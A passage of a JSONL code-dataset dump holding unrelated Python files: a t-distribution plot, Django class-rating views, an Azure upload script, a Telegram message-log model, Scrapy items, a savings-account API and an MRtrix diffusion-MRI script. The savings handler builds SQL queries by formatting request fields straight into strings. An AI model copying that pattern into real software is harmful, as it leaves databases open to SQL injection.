\"\\u03BD = \" + str(df))\r\n\r\nax.axvline(x = 0, color = 'k', linestyle = '--')\r\nax.axhline(y = 0.5, color = 'k', linestyle = '--')\r\n\r\n# compare with normal\r\nplt.plot(x,norm.cdf(x,loc = 0, scale = 1), color = 'k', label = 'Normal')\r\nplt.ylim((0, 1))\r\nplt.xlim((-5,5))\r\nplt.title(\"CDF of student's t\")\r\nplt.ylabel(\"CDF\")\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"Visualize-ML/Book5_Essentials-of-Probability-and-Statistics","sub_path":"Book5_Ch07_Python_Codes/Bk5_Ch07_04.py","file_name":"Bk5_Ch07_04.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1797,"dataset":"github-code","pt":"31"} +{"seq_id":"19244335996","text":"from django.http import HttpResponse, HttpResponseRedirect, HttpResponsePermanentRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.core.context_processors import csrf\nfrom django.template import RequestContext\nfrom time import strptime, strftime\nfrom classes.models import *\nfrom GChartWrapper import *\nimport numpy\n\ndef home(request):\n\tif request.method == 'POST':\n\t\tif 'class' in request.POST:\n\t\t\ttry:\n\t\t\t\tclasszy_key = request.POST['class'].lower().replace(' ','')\n\t\t\t\tclasszy = Class.objects.get(key=classzy_key)\t\n\t\t\t\tclasszy.views += 1\n\t\t\t\tclasszy.save()\n\t\t\t\tassignments = classzy.assignments.all()\n\t\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5]}, context_instance=RequestContext(request))\n\t\t\texcept:\n\t\t\t\treturn render_to_response('index.html', {'warning' : \"Sorry, class code not found\", 'error_class' : request.POST['class'] }, context_instance=RequestContext(request))\n\t\t\t\t\n\t\telif 'class_code' in request.POST:\n\t\t\tif request.POST['class_code'] == \"\":\n\t\t\t\treturn render_to_response('index.html', {'adding_warning' : \"Class Code cannot be empty\" }, context_instance=RequestContext(request))\n\t\t\ttry:\n\t\t\t\tclasszy_key = request.POST['class_code'].lower().replace(' ','')\n\t\t\t\tclasszy = Class.objects.get(key=classzy_key)\n\t\t\t\treturn render_to_response('index.html', {'adding_warning' : \"That class is already in Classzy!\" }, context_instance=RequestContext(request))\n\t\t\texcept:\n\t\t\t\tclasszy_key = request.POST['class_code'].lower().replace(' ','')\n\t\t\t\tclasszy = Class(key=classzy_key, code=request.POST['class_code'].upper())\n\t\t\t\tclasszy.views += 1\n\t\t\t\tclasszy.save()\n\t\t\t\tassignments = classzy.assignments.all()\n\t\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5]}, context_instance=RequestContext(request))\n\t\t\t\t\n\t\telif 'edit_class_code' in request.POST:\n\t\t\tclasszy = Class.objects.get(code=request.POST['edit_class_code'])\n\t\t\tclasszy.name = request.POST['edit_class_name']\n\t\t\tclasszy.professor = request.POST['edit_class_professor']\n\t\t\tclasszy.save()\n\t\t\tassignments = classzy.assignments.all()\n\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5], 'updated': True}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'delete_class_code' in request.POST:\n\t\t\tclasszy = Class.objects.get(code=request.POST['delete_class_code'])\n\t\t\tassignments = classzy.assignments.all()\n\t\t\tassignments = sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True)\n\t\t\tdelete = Delete_Queue(title=\"Someone asked to delete \" + classzy.code)\n\t\t\tdelete.save()\n\t\t\tclasszy.delete = True\n\t\t\tclasszy.delete_queue = delete\n\t\t\tclasszy.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : assignments, 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Deletion notice has been sent to admins.\"}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_classzy' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['add_assignment_classzy'])\n\t\t\tassignments = classzy.assignments.all()\n\t\t\tif 'add_assignment_name' in request.POST and request.POST['add_assignment_name'] != \"\":\n\t\t\t\ttry:\n\t\t\t\t\tassignment = Assignment(name=request.POST['add_assignment_name'])\n\t\t\t\t\tassignment.classzy = classzy\n\t\t\t\t\tif request.POST['add_assignment_type'] == \"homework\":\n\t\t\t\t\t\tassignment.homework = True\t\t\n\t\t\t\t\tif request.POST['add_assignment_type'] == \"test\":\n\t\t\t\t\t\tassignment.test = True\n\t\t\t\t\tassignment.due_date = request.POST['add_assignment_due_date']\n\t\t\t\t\tassignment.save()\n\t\t\t\t\trating = Rating(rating=int(request.POST['add_assignment_rating']))\n\t\t\t\t\trating.assignment = assignment\n\t\t\t\t\trating.save()\n\t\t\t\t\tratings = assignment.ratings.all()\n\t\t\t\t\tprev_ratings = list(ratings)\n\t\t\t\t\tprev_ratings.append(rating)\n\t\t\t\t\tassignment.ratings = prev_ratings\n\t\t\t\t\tassignment.avg_rating = rating.rating\n\t\t\t\t\tassignment.num_ratings = 1\n\t\t\t\t\t\n\t\t\t\t\tchart_data = [0, 0, 0, 0, 0]\n\t\t\t\t\tfor time in prev_ratings:\n\t\t\t\t\t\tif time.rating == 1:\n\t\t\t\t\t\t\tchart_data[0] += 1\n\t\t\t\t\t\telif time.rating == 2:\n\t\t\t\t\t\t\tchart_data[1] += 1\n\t\t\t\t\t\telif time.rating == 3:\n\t\t\t\t\t\t\tchart_data[2] += 1\n\t\t\t\t\t\telif time.rating == 4:\n\t\t\t\t\t\t\tchart_data[3] += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tchart_data[4] += 1\n\t\t\t\t\tG = VerticalBarStack(chart_data)\n\t\t\t\t\tG.color('3D71A3')\n\t\t\t\t\tG.label('1','2','3','4', '5')\n\t\t\t\t\tG.size(250,125)\n\t\t\t\t\tG.bar(37,15)\n\t\t\t\t\tG.marker('N*','black',0,-1,11)\n\t\t\t\t\tif (max(chart_data) > 10):\n\t\t\t\t\t\tmax_range = max(chart_data) + 4\n\t\t\t\t\telse:\n\t\t\t\t\t\tmax_range = max(chart_data) + 1\n\t\t\t\t\tchart_url = str(G) + '&chds=0,'+str(max_range)+'&chf=bg,s,65432100'\n\t\t\t\t\tassignment.ratings_chart_url = chart_url\n\t\t\t\t\tassignment.save()\n\t\t\t\texcept:\n\t\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Incorrect info submitted\"}, context_instance=RequestContext(request))\n\t\t\telse:\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(assignments, key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Assignment needs a name\"}, context_instance=RequestContext(request))\n\t\t\tprev_assignments = list(assignments)\n\t\t\tprev_assignments.append(assignment)\n\t\t\tclasszy.assignments = prev_assignments\n\t\t\tclasszy.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'added': True}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_difficulty_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['add_assignment_difficulty_name'])\n\t\t\trating = Rating(rating=int(request.POST['add_assignment_rating']))\n\t\t\trating.assignment = assignment\n\t\t\trating.save()\n\t\t\tratings = assignment.ratings.all()\n\t\t\tprev_ratings = list(ratings)\n\t\t\tprev_ratings.append(rating)\n\t\t\tassignment.ratings = prev_ratings\n\t\t\tratings_sum = 0\n\t\t\tfor rate in prev_ratings:\n\t\t\t\tratings_sum += rate.rating\n\t\t\tassignment.avg_rating = ratings_sum / len(prev_ratings)\n\t\t\tassignment.num_ratings += 1\n\t\t\t\n\t\t\tchart_data = [0, 0, 0, 0, 0]\n\t\t\tfor time in prev_ratings:\n\t\t\t\tif time.rating == 1:\n\t\t\t\t\tchart_data[0] += 1\n\t\t\t\telif time.rating == 2:\n\t\t\t\t\tchart_data[1] += 1\n\t\t\t\telif time.rating == 3:\n\t\t\t\t\tchart_data[2] += 1\n\t\t\t\telif time.rating == 4:\n\t\t\t\t\tchart_data[3] += 1\n\t\t\t\telse:\n\t\t\t\t\tchart_data[4] += 1\n\t\t\tG = VerticalBarStack(chart_data)\n\t\t\tG.color('3D71A3')\n\t\t\tG.label('1','2','3','4', '5')\n\t\t\tG.size(250,125)\n\t\t\tG.bar(37,15)\n\t\t\tG.marker('N*','black',0,-1,11)\n\t\t\tif (max(chart_data) > 10):\n\t\t\t\tmax_range = max(chart_data) + 4\n\t\t\telse:\n\t\t\t\tmax_range = max(chart_data) + 1\n\t\t\tchart_url = str(G) + '&chds=0,'+str(max_range)+'&chf=bg,s,65432100'\n\t\t\tassignment.ratings_chart_url = chart_url\n\t\t\tassignment.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"New rating added\", 'details' : True}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_time_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['add_assignment_time_name'])\n\t\t\ttime = Time(time=int(request.POST['add_assignment_time']))\n\t\t\ttime.assignment = assignment\n\t\t\ttime.save()\n\t\t\ttimes = assignment.times.all()\n\t\t\tprev_times = list(times)\n\t\t\tprev_times.append(time)\n\t\t\tassignment.times = prev_times\n\t\t\tassignment.num_times += 1\n\t\t\ttime_array = []\n\t\t\tfor time in prev_times:\n\t\t\t\ttime_array.append(time.time)\n\t\t\t\tif assignment.min_time == 0 or time.time < assignment.min_time:\n\t\t\t\t\tassignment.min_time = time.time\n\t\t\t\tif assignment.max_time == 0 or time.time > assignment.max_time:\n\t\t\t\t\tassignment.max_time = time.time\n\t\t\tassignment.avg_time = str(numpy.average(time_array))\n\t\t\tassignment.std_time = str(numpy.std(time_array))\n\t\t\t\n\t\t\tchart_data = [0, 0, 0, 0]\n\t\t\tfor time in prev_times:\n\t\t\t\tif (time.time < 10):\n\t\t\t\t\tchart_data[0] += 1\n\t\t\t\telif (time.time < 20):\n\t\t\t\t\tchart_data[1] += 1\n\t\t\t\telif (time.time < 30):\n\t\t\t\t\tchart_data[2] += 1\n\t\t\t\telse:\n\t\t\t\t\tchart_data[3] += 1\n\t\t\tG = VerticalBarStack(chart_data)\n\t\t\tG.color('3D71A3')\n\t\t\tG.label('0-9','10-19','20-29','30 plus')\n\t\t\tG.size(250,125)\n\t\t\tG.bar(50,15)\n\t\t\tG.marker('N*','black',0,-1,11)\n\t\t\tif (max(chart_data) > 10):\n\t\t\t\tmax_range = max(chart_data) + 4\n\t\t\telse:\n\t\t\t\tmax_range = max(chart_data) + 1\n\t\t\tchart_url = str(G) + '&chds=0,'+str(max_range)+'&chf=bg,s,65432100'\n\t\t\tassignment.chart_url = chart_url\n\t\t\tassignment.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"New time added\"}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'add_assignment_comment_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['add_assignment_comment_name'])\n\t\t\tif 'comment_text' in request.POST and request.POST['comment_text'] != \"\" and 'comment_name' in request.POST and request.POST['comment_name'] != \"\":\n\t\t\t\tcomment = Comment(name=request.POST['comment_name'],comment=request.POST['comment_text'])\n\t\t\t\tcomment.assignment = assignment\n\t\t\t\tcomment.save()\n\t\t\t\tcomments = assignment.comments.all()\n\t\t\t\tprev_comments = list(comments)\n\t\t\t\tprev_comments.append(comment)\n\t\t\t\tassignment.comments = prev_comments\n\t\t\t\tassignment.latest_comment_name = request.POST['comment_name']\n\t\t\t\tassignment.latest_comment_text = request.POST['comment_text']\n\t\t\t\tassignment.save()\n\t\t\telse:\n\t\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Cannot leave empty comment\"}, context_instance=RequestContext(request))\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"New comment added\"}, context_instance=RequestContext(request))\n\t\t\t\n\t\telif 'delete_assignment_name' in request.POST:\n\t\t\tclasszy = Class.objects.get(key=request.POST['hidden_classzy'])\n\t\t\tassignment = Assignment.objects.get(name=request.POST['delete_assignment_name'])\t\n\t\t\tdelete = Delete_Queue(title=\"Someone asked to delete \" + classzy.code + \" : \" + assignment.name)\n\t\t\tdelete.save()\n\t\t\tassignment.delete = True\n\t\t\tassignment.delete_queue = delete\n\t\t\tassignment.save()\n\t\t\treturn render_to_response('index.html', {'classzy' : classzy, 'assignments' : sorted(classzy.assignments.all(), key=lambda assignment: assignment.due_date, reverse=True), 'total_ratings' : [1, 2, 3, 4, 5], 'warning': \"Deletion notice has been sent to admins.\"}, context_instance=RequestContext(request))\n\t\t\t\n\treturn render_to_response('index.html', context_instance=RequestContext(request))\n","repo_name":"imkevinxu/classzy","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"43327572352","text":"import os\nimport sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\nfrom set_up_aml.util import _establish_connection_to_aml_workspace\nimport torch\n\ndef upload_file(path_to_local_file,path_to_blob):\n try:\n ws=_establish_connection_to_aml_workspace()\n except Exception as e:\n print(\"failed to connect to worksapce\")\n raise e\n try:\n default_data_store=ws.get_default_datastore()\n default_data_store.upload_files(files=path_to_local_file,\n target_path=path_to_blob,\n overwrite=True)\n except Exception as e:\n print(\"failed to upload\")\n raise e\n\nif __name__ == \"__main__\":\n try:\n dummy_data=torch.randn(256,10)\n torch.save(dummy_data,'dummy_data_file')\n upload_file([\"dummy_data_file\"],\"dummy\")\n except Exception as e:\n print(e)","repo_name":"admin822/Azure_Machine_Learning_How_to_Use","sub_path":"upload_data/upload_to_datastore.py","file_name":"upload_to_datastore.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45628851376","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\nfrom model.dbconf import db\nfrom tools.help import getGuid, getTime, setPageing, dictToListJoinDict, toDate\n\n\nclass TaskPrivateLog(db.Model):\n __tablename__ = 'tg_task_private_log'\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n guid = db.Column(db.String(38), unique=True, index=True)\n task_id = db.Column(db.String(38))\n user_account_id = db.Column(db.String(38))\n user_account_group_user_id = db.Column(db.String(38))\n soKey = db.Column(db.String(30))\n tg_username = db.Column(db.String(180))\n tg_user_id = db.Column(db.String(180))\n tg_access_hash = db.Column(db.String(180))\n tg_nicename = db.Column(db.String(180))\n tg_phone = db.Column(db.String(180))\n text = db.Column(db.Text)\n status = db.Column(db.Integer, default=1)\n create_time = db.Column(db.Integer, default=10)\n update_time = db.Column(db.Integer, default=10)\n iPage = 1\n\n def __init__(self, guid=None, task_id=None, user_account_id=None, user_account_group_user_id=None, soKey=None,\n tg_username=None, tg_user_id=None, tg_access_hash=None, tg_nicename=None, tg_phone=None, text=None,\n status=1,\n page=1):\n self.guid = guid\n self.task_id = task_id\n self.user_account_id = user_account_id\n self.user_account_group_user_id = user_account_group_user_id\n self.tg_username = tg_username\n self.tg_user_id = tg_user_id\n self.tg_access_hash = tg_access_hash\n self.tg_nicename = tg_nicename\n self.tg_phone = tg_phone\n self.soKey = soKey\n self.text = text\n self.status = status\n self.iPage = page\n\n def getDictionary(self):\n data = {}\n data[\"guid\"] = self.guid\n data[\"task_id\"] = self.task_id\n data[\"user_account_id\"] = self.user_account_id\n data[\"user_account_group_user_id\"] = self.user_account_group_user_id\n data[\"tg_username\"] = self.tg_username\n data[\"tg_user_id\"] = self.tg_user_id\n data[\"tg_access_hash\"] = self.tg_access_hash\n data[\"tg_nicename\"] = self.tg_nicename\n data[\"tg_phone\"] = self.tg_phone\n data[\"soKey\"] = self.soKey\n data[\"text\"] = self.text\n data[\"status\"] = self.status\n return data\n\n def insert(self):\n self.guid = str(getGuid())\n self.status = 1\n self.create_time = getTime()\n self.update_time = getTime()\n db.session.add(self)\n if db.session.commit() == None:\n return self.guid\n else:\n return False\n\n def update(self):\n data = {}\n data[\"text\"] = self.text\n data[\"update_time\"] = getTime()\n user = TaskPrivateLog.query.filter_by(guid=self.guid).update(data)\n if user is not None:\n if self.guid != None:\n return db.session.commit()\n return False\n\n def upStatus(self):\n data = {}\n data[\"status\"] = self.status\n data[\"update_time\"] = getTime()\n user = TaskPrivateLog.query.filter_by(guid=self.guid).update(data)\n if user is not None:\n if self.guid != None:\n return db.session.commit()\n return False\n\n def byListPage(self):\n db.session.commit()\n u = TaskPrivateLog.query.filter_by(task_id=self.task_id).order_by(TaskPrivateLog.id.desc()).paginate(\n page=self.iPage,\n per_page=30)\n items = dictToListJoinDict(u.items)\n u.items = items\n pageList = setPageing(u)\n return pageList\n\n def byGuidDetails(self):\n db.session.commit()\n d = TaskPrivateLog.query.filter_by(guid=self.guid).first()\n detail = {}\n if d != None:\n detail[\"id\"] = d.id\n detail[\"guid\"] = d.guid\n detail[\"task_id\"] = d.task_id\n detail[\"text\"] = d.text\n detail[\"status\"] = d.status\n detail[\"create_time\"] = toDate(d.create_time)\n detail[\"update_time\"] = toDate(d.update_time)\n return detail\n return None\n\n def getTaskListNotPage(self):\n db.session.commit()\n list = TaskPrivateLog.query.filter_by(status=1).all()\n if len(list) >= 1:\n dictList = dictToListJoinDict(list)\n return dictList\n return False\n\n def byGuidDel(self):\n stu = TaskPrivateLog.query.filter(TaskPrivateLog.task_id == self.task_id).delete()\n stuDel = db.session.commit()\n print(stu)\n print(stuDel)\n\n def getSendList(self, limit=0):\n db.session.commit()\n ilist = TaskPrivateLog.query.filter_by(task_id=self.task_id, status=1).order_by(TaskPrivateLog.id.desc()).limit(\n limit).all()\n return ilist\n\n def sendOk(self, guid=None):\n data = {}\n data[\"status\"] = 2\n data[\"update_time\"] = getTime()\n TaskPrivateLog.query.filter_by(guid=guid).update(data)\n db.session.commit()\n return True\n\n def getByTaskIdCount(self):\n db.session.commit()\n count = TaskPrivateLog.query.filter_by(task_id=self.task_id).filter_by(status=2).count()\n if count:\n return count\n return 0\n","repo_name":"x7c7v7i87/telegram-web-action","sub_path":"api/model/task_private_log.py","file_name":"task_private_log.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"31"} +{"seq_id":"16030176042","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nFILEITEM = 0\nFILEGROUP = 1\n\n\nclass FileGroup(Item):\n items = Field()\n\n\nclass FileItem(Item):\n url = Field()\n source = Field()\n name = Field()\n state = Field()\n year = Field()\n gid = Field()\n checksum = Field()\n raw_text = Field()\n\n\ndef default(type):\n if type == 0:\n return FileItem(\n source='',\n name='',\n state='',\n year='',\n gid=None,\n checksum='',\n raw_text=''\n )\n elif type == 1:\n return FileGroup(items=[])\n else:\n return None\n","repo_name":"mcialini/tsne","sub_path":"scrapers/scrapers/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25992736218","text":"from Utils.Tools import validations, authorized\nfrom Utils.GeneralTools import run_query, response, response_error\nimport json\nfrom Apis.Clients.ClassClient import ValidateClient\n\n@authorized\ndef list_saving(event, contex):\n\n data = run_query(\"select * from savings_account\", 'get')\n\n list_client = []\n for d in data:\n list_client.append(dict(\n account_id=d[0], client_id=d[1], account_number=d[2], balance=int(d[3]), activation_date=str(d[4]),\n city_id=d[5], country_id=d[6], account_status=d[7], user_creates=d[8]\n ))\n\n return response(200, \"savings_account list\", list_client)\n\n\n@authorized\ndef create_saving(event, context): \n\n data = json.loads(event['body'])\n \n client_active = ValidateClient.validate_status(data['client_id'])\n \n if client_active: \n\n run_query(\"insert into savings_account(client_id, account_number, balance, activation_date, city_id, country_id, account_status, user_creates) values(\\\n {}, '{}', {}, now(), {}, {}, 1, {})\".format(data['client_id'], data['account_number'], data['balance'], data['city_id'], data['country_id'], event['user_id']), 'post')\n\n return response(201, \"savings account created successfully\", data)\n \n return response_error(\"inactive or non-existent client\")\n\n\n@authorized\ndef update_saving(event, context):\n\n data = json.loads(event['body'])\n\n run_query(\"update savings_account set balance ={}, account_status = {} where account_id ={}\".format(\n data['balance'], data['account_status'], data['account_id']), 'post')\n\n return response(200, \"saving account updated sucessfully\", data)\n\n\n@validations\ndef create_country(event, context):\n\n data = json.loads(event['body'])\n\n run_query(\"insert into country(cod_country, name) values({}, '{}')\".format(\n data['cod_country'], data['name']), 'post')\n\n return response(200, \"country created sucessfully\", data)\n","repo_name":"kevinxavier7/Finance","sub_path":"Handlers/SavingHandler.py","file_name":"SavingHandler.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22177412551","text":"def initParser(subparsers, base_parser):\n import argparse\n parser = subparsers.add_parser('msmt_5tt', parents=[base_parser], help='Derive MSMT CSD responses based on a co-registered 5TT image')\n arguments = parser.add_argument_group('Positional arguments specific to the \\'msmt_5tt\\' algorithm')\n arguments.add_argument('in_5tt', help='Input co-registered 5TT image')\n arguments.add_argument('out_gm', help='Output GM response text file')\n arguments.add_argument('out_wm', help='Output WM response text file')\n arguments.add_argument('out_csf', help='Output CSF response text file')\n options = parser.add_argument_group('Options specific to the \\'msmt_5tt\\' algorithm')\n options.add_argument('-dirs', help='Manually provide the fibre direction in each voxel (a tensor fit will be used otherwise)')\n options.add_argument('-fa', type=float, default=0.2, help='Upper fractional anisotropy threshold for isotropic tissue (i.e. GM and CSF) voxel selection')\n options.add_argument('-pvf', type=float, default=0.95, help='Partial volume fraction threshold for tissue voxel selection')\n options.add_argument('-wm_algo', metavar='algorithm', default='tournier', help='dwi2response algorithm to use for white matter single-fibre voxel selection')\n parser.set_defaults(algorithm='msmt_5tt')\n parser.set_defaults(single_shell=False)\n \n \n \ndef checkOutputFiles():\n import lib.app\n lib.app.checkOutputFile(lib.app.args.out_gm)\n lib.app.checkOutputFile(lib.app.args.out_wm)\n lib.app.checkOutputFile(lib.app.args.out_csf)\n\n\n\ndef getInputFiles():\n import os\n import lib.app\n from lib.runCommand import runCommand\n runCommand('mrconvert ' + lib.app.args.in_5tt + ' ' + os.path.join(lib.app.tempDir, '5tt.mif'))\n if lib.app.args.dirs:\n runCommand('mrconvert ' + lib.app.args.dirs + ' ' + os.path.join(lib.app.tempDir, 'dirs.mif') + ' -stride 0,0,0,1')\n\n\n\ndef execute():\n import math, os, shutil\n import lib.app\n from lib.getHeaderInfo import getHeaderInfo\n from lib.getImageStat import getImageStat\n from lib.printMessage import printMessage\n from lib.runCommand import runCommand\n from lib.warnMessage import warnMessage\n from lib.errorMessage import errorMessage\n \n # Ideally want to use the oversampling-based regridding of the 5TT image from the SIFT model, not mrtransform\n # May need to commit 5ttregrid...\n\n # Verify input 5tt image\n sizes = [ int(x) for x in getHeaderInfo('5tt.mif', 'size').split() ]\n datatype = getHeaderInfo('5tt.mif', 'datatype')\n if not len(sizes) == 4 or not sizes[3] == 5 or not datatype.startswith('Float'):\n errorMessage('Imported anatomical image ' + os.path.basename(lib.app.args.in_5tt) + ' is not in the 5TT format')\n\n # Get shell information\n shells = [ int(round(float(x))) for x in getHeaderInfo('dwi.mif', 'shells').split() ]\n if len(shells) < 3:\n warnMessage('Less than three b-value shells; response functions will not be applicable in MSMT CSD algorithm')\n\n # Get lmax information (if provided)\n wm_lmax = [ ]\n if lib.app.args.lmax:\n wm_lmax = [ int(x.strip()) for x in lib.app.args.lmax.split(',') ]\n if not len(wm_lmax) == len(shells):\n errorMessage('Number of manually-defined lmax\\'s (' + str(len(wm_lmax)) + ') does not match number of b-value shells (' + str(len(shells)) + ')')\n for l in wm_lmax:\n if l%2:\n errorMessage('Values for lmax must be even')\n if l<0:\n errorMessage('Values for lmax must be non-negative')\n\n runCommand('dwi2tensor dwi.mif - -mask mask.mif | tensor2metric - -fa fa.mif -vector vector.mif')\n if not os.path.exists('dirs.mif'):\n shutil.copy('vector.mif', 'dirs.mif')\n runCommand('mrtransform 5tt.mif 5tt_regrid.mif -template fa.mif -interp linear')\n\n # Tissue masks\n runCommand('mrconvert 5tt_regrid.mif - -coord 3 0 -axes 0,1,2 | mrcalc - ' + str(lib.app.args.pvf) + ' -gt fa.mif ' + str(lib.app.args.fa) + ' -lt -mult mask.mif -mult gm_mask.mif')\n runCommand('mrconvert 5tt_regrid.mif - -coord 3 2 -axes 0,1,2 | mrcalc - ' + str(lib.app.args.pvf) + ' -gt mask.mif -mult wm_mask.mif')\n runCommand('mrconvert 5tt_regrid.mif - -coord 3 3 -axes 0,1,2 | mrcalc - ' + str(lib.app.args.pvf) + ' -gt fa.mif ' + str(lib.app.args.fa) + ' -lt -mult mask.mif -mult csf_mask.mif')\n\n # Revise WM mask to only include single-fibre voxels\n printMessage('Calling dwi2response recursively to select WM single-fibre voxels using \\'' + lib.app.args.wm_algo + '\\' algorithm')\n runCommand('dwi2response -quiet ' + lib.app.args.wm_algo + ' dwi.mif wm_ss_response.txt -mask wm_mask.mif -voxels wm_sf_mask.mif')\n\n # Check for empty masks\n gm_voxels = int(getImageStat('gm_mask.mif', 'count', 'gm_mask.mif'))\n wm_voxels = int(getImageStat('wm_sf_mask.mif', 'count', 'wm_sf_mask.mif'))\n csf_voxels = int(getImageStat('csf_mask.mif', 'count', 'csf_mask.mif'))\n empty_masks = [ ]\n if not gm_voxels:\n empty_masks.append('GM')\n if not wm_voxels:\n empty_masks.append('WM')\n if not csf_voxels:\n empty_masks.append('CSF')\n if empty_masks:\n message = ','.join(empty_masks)\n message += ' tissue mask'\n if len(empty_masks) > 1:\n message += 's'\n message += ' empty; cannot estimate response function'\n if len(empty_masks) > 1:\n message += 's'\n errorMessage(message)\n\n # For each of the three tissues, generate a multi-shell response\n # Since here we're guaranteeing that GM and CSF will be isotropic in all shells, let's use mrstats rather than sh2response (seems a bit weird passing a directions file to sh2response with lmax=0...)\n\n gm_responses = [ ]\n wm_responses = [ ]\n csf_responses = [ ]\n max_length = 0\n\n for index, b in enumerate(shells):\n dwi_path = 'dwi_b' + str(b) + '.mif'\n mean_dwi_path = 'dwi_b' + str(b) + '_mean.mif'\n # dwiextract will now yield a 4D image, even if there's only a single volume in a shell\n runCommand('dwiextract dwi.mif -shell ' + str(b) + ' ' + dwi_path)\n runCommand('mrmath ' + dwi_path + ' mean ' + mean_dwi_path + ' -axis 3')\n gm_mean = float(getImageStat(mean_dwi_path, 'mean', 'gm_mask.mif'))\n csf_mean = float(getImageStat(mean_dwi_path, 'mean', 'csf_mask.mif'))\n gm_responses .append( str(gm_mean * math.sqrt(4.0 * math.pi)) )\n csf_responses.append( str(csf_mean * math.sqrt(4.0 * math.pi)) )\n this_b_lmax_option = ''\n if wm_lmax:\n this_b_lmax_option = ' -lmax ' + str(wm_lmax[index])\n runCommand('amp2sh ' + dwi_path + ' - | sh2response - wm_sf_mask.mif dirs.mif wm_response_b' + str(b) + '.txt' + this_b_lmax_option)\n wm_response = open('wm_response_b' + str(b) + '.txt', 'r').read().split()\n wm_responses.append(wm_response)\n max_length = max(max_length, len(wm_response))\n\n with open('gm.txt', 'w') as f:\n for line in gm_responses:\n f.write(line + '\\n')\n with open('wm.txt', 'w') as f:\n for line in wm_responses:\n line += ['0'] * (max_length - len(line))\n f.write(' '.join(line) + '\\n')\n with open('csf.txt', 'w') as f:\n for line in csf_responses:\n f.write(line + '\\n')\n\n shutil.copyfile('gm.txt', os.path.join(lib.app.workingDir, lib.app.args.out_gm))\n shutil.copyfile('wm.txt', os.path.join(lib.app.workingDir, lib.app.args.out_wm))\n shutil.copyfile('csf.txt', os.path.join(lib.app.workingDir, lib.app.args.out_csf))\n\n # Generate output 4D binary image with voxel selections\n runCommand('mrcat gm_mask.mif wm_sf_mask.mif csf_mask.mif voxels.mif -axis 3')\n\n","repo_name":"noxtoby/mrtrix3_14","sub_path":"scripts/src/dwi2response/msmt_5tt.py","file_name":"msmt_5tt.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} 